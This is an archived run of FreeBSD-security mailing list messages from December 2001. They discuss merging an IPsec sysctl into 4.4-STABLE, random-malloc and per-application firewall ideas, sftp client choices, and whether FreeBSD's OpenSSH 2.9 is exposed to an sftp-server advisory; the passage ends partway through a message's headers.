Date: Mon, 3 Dec 2001 09:29:21 -0800 (PST)
From: Trent Tobias <tritttrott@yahoo.com>
Subject: net.key.prefered_olsa and 4.4-STABLE
To: freebsd-security@freebsd.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

I read about a new sysctl which allows a rebooted
ipsec gateway to re-use the 
oldsa or the new sa presented to it by other gateways
depending on what the 
net.key.prefered_oldsa is set to.

Looking at the latest KAME snapshot I notice that this
is integrated in 
sys/netkey but not yet in 4.4-STABLE

Any Idea as to when this will make it's way to STABLE?

__________________________________________________
Do You Yahoo!?
Buy the perfect holiday gifts at Yahoo! Shopping.
http://shopping.yahoo.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3  9:30:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.unsecure.net (sense-sea-MegaSub-1-753.oz.net [216.39.146.245])
	by hub.freebsd.org (Postfix) with ESMTP id 0559337B405
	for <freebsd-security@FreeBSD.ORG>; Mon,  3 Dec 2001 09:30:07 -0800 (PST)
Received: (from zach@localhost)
	by mail.unsecure.net (8.11.6/8.11.6) id fB3HYrY43739
	for freebsd-security@FreeBSD.ORG; Mon, 3 Dec 2001 09:34:53 -0800 (PST)
	(envelope-from zach)
Date: Mon, 3 Dec 2001 09:34:47 -0800
From: "Zachary M. Smith" <spader@arbornet.org>
To: freebsd-security@FreeBSD.ORG
Subject: Re: philosophical question...
Message-ID: <20011203093447.E32204@arbornet.org>
Mail-Followup-To: freebsd-security@FreeBSD.ORG
References: <20011203032305.K92148@elvis.mu.org> <Pine.NEB.3.96L.1011203074251.94074Q-100000@fledge.watson.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="8P1HSweYDcXXzwPJ"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <Pine.NEB.3.96L.1011203074251.94074Q-100000@fledge.watson.org>; from rwatson@FreeBSD.ORG on Mon, Dec 03, 2001 at 07:44:24AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--8P1HSweYDcXXzwPJ
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

If we're talking about a userland.<applicationname> and having
applications decide wether or not they want to use the new random
malloc, maybe looking into setting up something like Darwin's
'defaults' would be a good way to go.

-zach

On Mon, Dec 03, 2001 at 07:44:24AM -0500, Robert Watson wrote:
>=20
> On Mon, 3 Dec 2001, Alfred Perlstein wrote:
>=20
> > * Oleg Cherkasov <Oleg.Cherkasov@mail.com> [011203 03:16] wrote:
> > >=20
> > > Think a new key 'malloc.random' for sysctl could be more useful, prot=
ected=20
> > > with 'kern.securelevel' > 1.
> >=20
> > However, malloc(3) has nothing to do with the kernel.
>=20
> Yeah, I'm not sure why it would be keyed off of 'securelevel'.  Seems to
> me that we should avoid any more userland cruft being associated
> unnecessarily with securelevels, actually :-).=20
>=20
> And if we do stuff this in a securelevel, it sounds like we need a
> userland.<applicationname> sysctl namespace.  More likely, we just need
> this to be a flag on /etc/malloc.conf.=20
>=20
> Robert N M Watson             FreeBSD Core Team, TrustedBSD Project
> robert@fledge.watson.org      NAI Labs, Safeport Network Services
>=20
>=20
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

--=20

--8P1HSweYDcXXzwPJ
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8C7e3M6FaXlC3H6ARApJPAJ9nixMqxizD8dLQpykXhlVt+XVJ5QCfScJ5
rFoPNK3UiADaAUPNHI17kbk=
=g+Dv
-----END PGP SIGNATURE-----

--8P1HSweYDcXXzwPJ--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3 10:48:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cheer.mahoroba.org (flets-f0022.kamome.or.jp [211.8.127.22])
	by hub.freebsd.org (Postfix) with ESMTP id 1EF6237B416
	for <freebsd-security@freebsd.org>; Mon,  3 Dec 2001 10:48:44 -0800 (PST)
Received: from piano.mahoroba.org (IDENT:QLUtLWr+A8CG8ZrIh35j84Iv/JgD+i3cMxxia1ocPl5YHIcTAoX74bpHwPe7OOhO@piano.mahoroba.org [IPv6:2001:200:301:0:240:96ff:fe48:4ea8])
	(user=ume mech=CRAM-MD5 bits=0)
	by cheer.mahoroba.org (8.12.1/8.12.1) with ESMTP/inet6 id fB3ImeLf024480
	(version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO);
	Tue, 4 Dec 2001 03:48:40 +0900 (JST)
	(envelope-from ume@mahoroba.org)
Date: Tue, 04 Dec 2001 03:48:28 +0900
Message-ID: <ygeelmcrvgj.wl@piano.mahoroba.org>
From: Hajimu UMEMOTO <ume@mahoroba.org>
To: Trent Tobias <tritttrott@yahoo.com>
Cc: freebsd-security@freebsd.org
Subject: Re: net.key.prefered_olsa and 4.4-STABLE
In-Reply-To: <20011203172921.73215.qmail@web21205.mail.yahoo.com>
References: <20011203172921.73215.qmail@web21205.mail.yahoo.com>
User-Agent: xcite1.38> Wanderlust/2.7.6 (Too Funky) SEMI/1.14.3 (Ushinoya)
 FLIM/1.14.3 (=?ISO-8859-4?Q?Unebigory=F2mae?=) APEL/10.3 Emacs/21.1
 (i386--freebsd) MULE/5.0 (=?ISO-2022-JP?B?GyRCOC1MWhsoQg==?=)
X-Operating-System: FreeBSD 4.4-STABLE
MIME-Version: 1.0 (generated by SEMI 1.14.3 - "Ushinoya")
Content-Type: text/plain; charset=US-ASCII
X-Virus-Scanned: by AMaViS-perl11-milter (http://amavis.org/)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

>>>>> On Mon, 3 Dec 2001 09:29:21 -0800 (PST)
>>>>> Trent Tobias <tritttrott@yahoo.com> said:

tritttrott> I read about a new sysctl which allows a rebooted
tritttrott> ipsec gateway to re-use the 
tritttrott> oldsa or the new sa presented to it by other gateways
tritttrott> depending on what the 
tritttrott> net.key.prefered_oldsa is set to.

tritttrott> Looking at the latest KAME snapshot I notice that this
tritttrott> is integrated in 
tritttrott> sys/netkey but not yet in 4.4-STABLE

Yes, I know it.  I'm keeping enough period before merging from KAME.

tritttrott> Any Idea as to when this will make it's way to STABLE?

Okay, I'll merge it into CURRENT soon, then do MFC after about 1 week
since merging into CURRENT.  Please wait.

--
Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan
ume@mahoroba.org  ume@bisd.hitachi.co.jp  ume@{,jp.}FreeBSD.org
http://www.imasy.org/~ume/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3 12:54:12 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (66-188-116-16.mad.wi.charter.com [66.188.116.16])
	by hub.freebsd.org (Postfix) with ESMTP id 91D9837B405
	for <freebsd-security@FreeBSD.ORG>; Mon,  3 Dec 2001 12:54:06 -0800 (PST)
Received: (qmail 526 invoked by uid 1000); 3 Dec 2001 04:53:58 -0000
Received: from localhost (sendmail-bs@127.0.0.1)
  by localhost with SMTP; 3 Dec 2001 04:53:58 -0000
Date: Sun, 2 Dec 2001 22:53:58 -0600 (CST)
From: Mike Silbersack <silby@silby.com>
To: Ian Smith <smithi@nimnet.asn.au>
Cc: Brett Glass <brett@lariat.org>,
	Kris Kennaway <kris@obsecurity.org>, <freebsd-security@FreeBSD.ORG>
Subject: Re: Security zone
In-Reply-To: <Pine.BSF.3.96.1011125230455.14871C-100000@gaia.nimnet.asn.au>
Message-ID: <20011202224820.B505-100000@achilles.silby.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


On Sun, 25 Nov 2001, Ian Smith wrote:

> On Sat, 24 Nov 2001, Brett Glass wrote:
>
>  > FreeBSD doesn't have per-application control of ports and sockets,
>  > which is what ZoneAlarm *tries* to provide. It'd be nice to add this
>  > as built-in feature, either in the base OS or in ipfw.
>
> Yeah, Windows security 'features' for FreeBSD, just what we lack! :)
>
> Can't you do 'per-app' stuff in ipfw with users and/or groups?  Frankly
> I'm more contented relying on having port access control in rc.firewall.
>
> Cheers, Ian

I guess it's a bit late to jump in here, but I'd like to throw in a bit of
information.

While ipfw does allow you to filter by uid/gid, that feature falls short
of the goal of filtering an app.  Right now, sockets maintain the uid of
the process that spawned them.  Hence, apache worker threads still would
be filtered as uid 0, even though they've changed credentials and are
running as uid 80 (or nobody, or whatever you set it to.)

If merged in with some nifty ACL system which propegated rights through
forks, per-app firewalling _could_ be an awesome security feature - you
could restrict bind to doing connections to port 53 only, you could
restrict httpd to port 80, etc.  This is, of course, only one small part
of the ideal secure system, and wouldn't make a huge impact and many other
features are present (many of which are being working on by Robert Watson
& associates.)

In any case, don't knock the idea; if someone had the time to implement a
solid app-level firewalling, I'm sure it could be put to good use.

Mike "Silby" Silbersack


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3 15:17: 5 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www.kpi.com.au (www.kpi.com.au [203.39.132.210])
	by hub.freebsd.org (Postfix) with ESMTP id 9B43337B419
	for <freebsd-security@FreeBSD.ORG>; Mon,  3 Dec 2001 15:17:01 -0800 (PST)
Received: from kpi.com.au (localhost.kpi.com.au [127.0.0.1])
	by www.kpi.com.au (8.9.3/8.9.3) with ESMTP id KAA14018;
	Tue, 4 Dec 2001 10:24:16 +1100 (EST)
	(envelope-from johnsa@kpi.com.au)
Message-ID: <3C0C07BC.A415C3A4@kpi.com.au>
Date: Tue, 04 Dec 2001 10:16:12 +1100
From: Andrew Johns <johnsa@kpi.com.au>
X-Mailer: Mozilla 4.7 [en-gb] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Jeroen Massar <jeroen@unfix.org>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: analysis of attack ??
References: <006001c17691$1fad4870$420d640a@HELL>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


Jeroen Massar wrote:
> 
> Stijn Hoop wrote:
> 
> > [slightly offtopic]
> >
> > On Sun, Nov 25, 2001 at 02:20:05PM -0600, Alfred Perlstein wrote:
> > > Actually I recently saw that _finally_ they came out with a
> > > client that does ftp over ssh.  I think DataFellows has such a
> client
> > > you should check it out.
> >
> > Ehm, sftp(1)? ssh.com has a nice windows GUI client available
> > [1], which should work with recent -STABLE servers (after OpenSSH
> > upgrade at least). Or install openssh-portable.
> <SNIP>
> > [1] For a fee of course.
> 
> http://www.chiark.greenend.org.uk/~sgtatham/putty/ <-- PuTTY has an sftp
> command line client too ;)
> 
> PS: For free and with source ;)
> 

Not trying to outdo you, but a win gui scp client is nicer :)
http://winscp.vse.cz/eng/

PuTTY-based (I believe) and now incorporates v2 and pagent
support, amongst other things.

-- 
Andrew Johns

================================================================
BUGS:This utility is a prototype which lasted several years past
its expiration date and is greatly in need of death.
                              - from FreeBSD sysinstall man page

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3 17: 4:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from netau1.alcanet.com.au (ntp.alcanet.com.au [203.62.196.27])
	by hub.freebsd.org (Postfix) with ESMTP id 4F04737B405
	for <freebsd-security@freebsd.org>; Mon,  3 Dec 2001 17:04:42 -0800 (PST)
Received: from mfg1.cim.alcatel.com.au (mfg1.cim.alcatel.com.au [139.188.23.1])
	by netau1.alcanet.com.au (8.9.3 (PHNE_22672)/8.9.3) with ESMTP id MAA15023
	for <freebsd-security@freebsd.org>; Tue, 4 Dec 2001 12:04:36 +1100 (EDT)
Received: from gsmx07.alcatel.com.au by cim.alcatel.com.au
 (PMDF V5.2-32 #37645) with ESMTP id <01KBGX20YD2O4M2SZ4@cim.alcatel.com.au>
 for freebsd-security@freebsd.org; Tue, 4 Dec 2001 12:04:28 +1100
Received: (from jeremyp@localhost)	by gsmx07.alcatel.com.au (8.11.6/8.11.6)
 id fB414WC67187	for freebsd-security@freebsd.org; Tue,
 04 Dec 2001 12:04:32 +1100
Content-return: prohibited
Date: Tue, 04 Dec 2001 12:04:32 +1100
From: Peter Jeremy <peter.jeremy@alcatel.com.au>
Subject: OPIE mailing list
To: freebsd-security@freebsd.org
Mail-Followup-To: freebsd-security@freebsd.org
Message-id: <20011204120431.A67179@gsmx07.alcatel.com.au>
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

[OK, this is somewhat off-topic, but it is security related]
   
According to opie(4), "OPIE is discussed on the Bellcore `S/Key Users/
mailing list ... skey-users-request@thumper.bellcore.com".  Is this
still correct?  I can't get any DNS information for either either
thumper.bellcore.com or bellcore.com (as in "no response", not "not
found").
   
Peter

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3 18:28:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web11603.mail.yahoo.com (web11603.mail.yahoo.com [216.136.172.55])
	by hub.freebsd.org (Postfix) with SMTP id D959F37B419
	for <security@freebsd.org>; Mon,  3 Dec 2001 18:28:11 -0800 (PST)
Message-ID: <20011204022811.7604.qmail@web11603.mail.yahoo.com>
Received: from [24.189.82.162] by web11603.mail.yahoo.com via HTTP; Mon, 03 Dec 2001 18:28:11 PST
Date: Mon, 3 Dec 2001 18:28:11 -0800 (PST)
From: Holtor <holtor@yahoo.com>
Subject: OpenSSH Vulnerability
To: security@freebsd.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hi!

Is freebsd's SSH vulnerable to this?

http://www.securityfocus.com/archive/1/243430

The advisory says all versions prior to 2.9.9 are
vulnerable and I see sftp-server is on by default in
freebsd's sshd_config and freebsd has version 2.9

Ideas?

Holt

__________________________________________________
Do You Yahoo!?
Buy the perfect holiday gifts at Yahoo! Shopping.
http://shopping.yahoo.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3 18:37:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shemp.palomine.net (shemp.palomine.net [216.135.64.135])
	by hub.freebsd.org (Postfix) with SMTP id 3D49637B416
	for <security@freebsd.org>; Mon,  3 Dec 2001 18:37:15 -0800 (PST)
Received: (qmail 88424 invoked by uid 1000); 4 Dec 2001 02:37:08 -0000
Date: Mon, 3 Dec 2001 21:37:08 -0500
From: Chris Johnson <cjohnson@palomine.net>
To: Holtor <holtor@yahoo.com>
Cc: security@freebsd.org
Subject: Re: OpenSSH Vulnerability
Message-ID: <20011203213708.A88390@palomine.net>
References: <20011204022811.7604.qmail@web11603.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="jI8keyz6grp/JLjh"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011204022811.7604.qmail@web11603.mail.yahoo.com>; from holtor@yahoo.com on Mon, Dec 03, 2001 at 06:28:11PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--jI8keyz6grp/JLjh
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Mon, Dec 03, 2001 at 06:28:11PM -0800, Holtor wrote:
> Is freebsd's SSH vulnerable to this?
>=20
> http://www.securityfocus.com/archive/1/243430
>=20
> The advisory says all versions prior to 2.9.9 are
> vulnerable and I see sftp-server is on by default in
> freebsd's sshd_config

How do you figure that? I see:

# Uncomment if you want to enable sftp
#Subsystem      sftp    /usr/libexec/sftp-server

in my /etc/ssh/sshd_config file, and the sshd man page says, "By default no
subsystems are defined."

Chris Johnson

--jI8keyz6grp/JLjh
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8DDbTyeUEMvtGLWERAkc2AJ9QupZJ7or36BNawhlaeOdNuAq6fgCdG4Qo
BjKTtrZIGxkdEew0Dx47vmU=
=24S1
-----END PGP SIGNATURE-----

--jI8keyz6grp/JLjh--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3 18:41:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from d150h247.resnet.uconn.edu (d150h247.resnet.uconn.edu [137.99.150.247])
	by hub.freebsd.org (Postfix) with SMTP id F065D37B417
	for <freebsd-security@FreeBSD.ORG>; Mon,  3 Dec 2001 18:41:05 -0800 (PST)
Received: (qmail 67065 invoked by uid 1001); 4 Dec 2001 02:39:28 -0000
Date: Mon, 3 Dec 2001 21:39:28 -0500
From: "Peter C. Lai" <sirmoo@cowbert.2y.net>
To: Andrew Johns <johnsa@kpi.com.au>
Cc: Jeroen Massar <jeroen@unfix.org>, freebsd-security@FreeBSD.ORG
Subject: Re: analysis of attack ??
Message-ID: <20011203213928.A67060@cowbert.2y.net>
Reply-To: peter.lai@uconn.edu
References: <006001c17691$1fad4870$420d640a@HELL> <3C0C07BC.A415C3A4@kpi.com.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3C0C07BC.A415C3A4@kpi.com.au>; from johnsa@kpi.com.au on Tue, Dec 04, 2001 at 10:16:12AM +1100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

afaik, winscp does not have ssh2 capability.
Because of that, we have migrated to the sftp-client from www.ssh.com

On Tue, Dec 04, 2001 at 10:16:12AM +1100, Andrew Johns wrote:
> 
> 
> Jeroen Massar wrote:
> > 
> > Stijn Hoop wrote:
> > 
> > > [slightly offtopic]
> > >
> > > On Sun, Nov 25, 2001 at 02:20:05PM -0600, Alfred Perlstein wrote:
> > > > Actually I recently saw that _finally_ they came out with a
> > > > client that does ftp over ssh.  I think DataFellows has such a
> > client
> > > > you should check it out.
> > >
> > > Ehm, sftp(1)? ssh.com has a nice windows GUI client available
> > > [1], which should work with recent -STABLE servers (after OpenSSH
> > > upgrade at least). Or install openssh-portable.
> > <SNIP>
> > > [1] For a fee of course.
> > 
> > http://www.chiark.greenend.org.uk/~sgtatham/putty/ <-- PuTTY has an sftp
> > command line client too ;)
> > 
> > PS: For free and with source ;)
> > 
> 
> Not trying to outdo you, but a win gui scp client is nicer :)
> http://winscp.vse.cz/eng/
> 
> PuTTY-based (I believe) and now incorporates v2 and pagent
> support, amongst other things.
> 
> -- 
> Andrew Johns
> 
> ================================================================
> BUGS:This utility is a prototype which lasted several years past
> its expiration date and is greatly in need of death.
>                               - from FreeBSD sysinstall man page
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

-- 
Peter C. Lai
University of Connecticut
Dept. of Residential Life | Programmer
Dept. of Molecular and Cell Biology |
Undergraduate Research Assistant
http://cowbert.2y.net/
860.427.4542
203.206.3784

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3 18:43:11 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shemp.palomine.net (shemp.palomine.net [216.135.64.135])
	by hub.freebsd.org (Postfix) with SMTP id 1C02837B416
	for <freebsd-security@FreeBSD.ORG>; Mon,  3 Dec 2001 18:43:07 -0800 (PST)
Received: (qmail 88573 invoked by uid 1000); 4 Dec 2001 02:43:06 -0000
Date: Mon, 3 Dec 2001 21:43:06 -0500
From: Chris Johnson <cjohnson@palomine.net>
To: peter.lai@uconn.edu
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: analysis of attack ??
Message-ID: <20011203214306.A88548@palomine.net>
References: <006001c17691$1fad4870$420d640a@HELL> <3C0C07BC.A415C3A4@kpi.com.au> <20011203213928.A67060@cowbert.2y.net>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="/9DWx/yDrRhgMJTb"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011203213928.A67060@cowbert.2y.net>; from sirmoo@cowbert.2y.net on Mon, Dec 03, 2001 at 09:39:28PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--/9DWx/yDrRhgMJTb
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

On Mon, Dec 03, 2001 at 09:39:28PM -0500, Peter C. Lai wrote:
> afaik, winscp does not have ssh2 capability.

It does now.

Chris Johnson

--/9DWx/yDrRhgMJTb
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8DDg5yeUEMvtGLWERAiR/AKDueUb6g0+sben1JyTobXnELUkyfACfajx9
qF4gqYLx6/GvUCpFXbZ2wvU=
=xX+7
-----END PGP SIGNATURE-----

--/9DWx/yDrRhgMJTb--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3 18:47:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web11601.mail.yahoo.com (web11601.mail.yahoo.com [216.136.172.53])
	by hub.freebsd.org (Postfix) with SMTP id 912C337B405
	for <security@freebsd.org>; Mon,  3 Dec 2001 18:47:18 -0800 (PST)
Message-ID: <20011204024718.74912.qmail@web11601.mail.yahoo.com>
Received: from [24.189.82.162] by web11601.mail.yahoo.com via HTTP; Mon, 03 Dec 2001 18:47:18 PST
Date: Mon, 3 Dec 2001 18:47:18 -0800 (PST)
From: Holtor <holtor@yahoo.com>
Subject: Re: OpenSSH Vulnerability
To: Chris Johnson <cjohnson@palomine.net>
Cc: security@freebsd.org
In-Reply-To: <20011203213708.A88390@palomine.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

It is enabled here:

/usr/src/crypto/openssh/sshd_config

Thats the only sshd_config in /usr/src besides the one
in picobsd so I figure its what should be used when
upgrading a system. I don't think mergemaster updates
anything in /etc/ssh because nothing exists in
/usr/src/etc/ssh -- probably am wrong though.

Just wondering also how people go about updating their
sshd_config. I know there was many changes when
freebsd
changed from openssh 2.3.0 to openssh 2.9.

Holt

--- Chris Johnson <cjohnson@palomine.net> wrote:
> On Mon, Dec 03, 2001 at 06:28:11PM -0800, Holtor
> wrote:
> > Is freebsd's SSH vulnerable to this?
> > 
> > http://www.securityfocus.com/archive/1/243430
> > 
> > The advisory says all versions prior to 2.9.9 are
> > vulnerable and I see sftp-server is on by default
> in
> > freebsd's sshd_config
> 
> How do you figure that? I see:
> 
> # Uncomment if you want to enable sftp
> #Subsystem      sftp    /usr/libexec/sftp-server
> 
> in my /etc/ssh/sshd_config file, and the sshd man
> page says, "By default no
> subsystems are defined."
> 
> Chris Johnson
> 

> ATTACHMENT part 2 application/pgp-signature 


__________________________________________________
Do You Yahoo!?
Buy the perfect holiday gifts at Yahoo! Shopping.
http://shopping.yahoo.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3 18:51:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from www.kpi.com.au (www.kpi.com.au [203.39.132.210])
	by hub.freebsd.org (Postfix) with ESMTP id E0C9737B405
	for <freebsd-security@FreeBSD.ORG>; Mon,  3 Dec 2001 18:51:16 -0800 (PST)
Received: from kpi.com.au (localhost.kpi.com.au [127.0.0.1])
	by www.kpi.com.au (8.9.3/8.9.3) with ESMTP id NAA14416;
	Tue, 4 Dec 2001 13:58:36 +1100 (EST)
	(envelope-from johnsa@kpi.com.au)
Message-ID: <3C0C39F8.9D6143DD@kpi.com.au>
Date: Tue, 04 Dec 2001 13:50:32 +1100
From: Andrew Johns <johnsa@kpi.com.au>
X-Mailer: Mozilla 4.7 [en-gb] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: peter.lai@uconn.edu
Cc: Jeroen Massar <jeroen@unfix.org>, freebsd-security@FreeBSD.ORG
Subject: Re: analysis of attack ??
References: <006001c17691$1fad4870$420d640a@HELL> <3C0C07BC.A415C3A4@kpi.com.au> <20011203213928.A67060@cowbert.2y.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
